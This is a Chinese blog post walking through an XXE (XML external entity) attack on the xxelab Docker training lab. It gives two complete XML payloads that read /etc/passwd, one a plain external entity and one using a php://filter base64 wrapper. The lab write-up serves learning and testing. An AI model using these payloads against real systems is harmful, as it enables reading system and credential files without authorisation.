web漏洞|XXE漏洞复现

  • A+
所属分类:安全文章

docker搜索xxe相关镜像包,然后pull下来,我这里pull的是:rrodrigo/xxelab 镜像包。


启动docker环境,映射到VPS的32776端口


web漏洞|XXE漏洞复现


访问


web漏洞|XXE漏洞复现

输入注册数据,抓包重放。发现提交数据包采用 xml 格式传递,且邮箱有返回。


web漏洞|XXE漏洞复现


这里我们引用外部DTD实体,并且将email的值修改为引用外部实体的值 &file;   因为,返回包会返回email的值,所以返回包会读取我们引用的 /etc/passwd 的值返回给我们,造成了任意文件读取。


这里指定文件/etc/passwd,用不用file协议均可。


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test[        <!ENTITY file SYSTEM "/etc/passwd">]><root><name>111</name><tel>222</tel><email>&file;</email><password>333</password></root>



web漏洞|XXE漏洞复现


web漏洞|XXE漏洞复现


利用 base64 编码进行 xxe,防止有返回包验证。返回base64数据包,base64解码之。


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test[        <!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]><root><name>111</name><tel>222</tel><email>&file;</email><password>333</password></root>



web漏洞|XXE漏洞复现


相关文章:XML和JSON数据格式

                 XXE(XML外部实体注入)



web漏洞|XXE漏洞复现





来源:谢公子的博客

责编:Zuo

web漏洞|XXE漏洞复现

web漏洞|XXE漏洞复现
web漏洞|XXE漏洞复现
由于文章篇幅较长,请大家耐心。如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。
最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)
web漏洞|XXE漏洞复现
web漏洞|XXE漏洞复现

web漏洞|XXE漏洞复现


本文始发于微信公众号(谢公子学安全):web漏洞|XXE漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: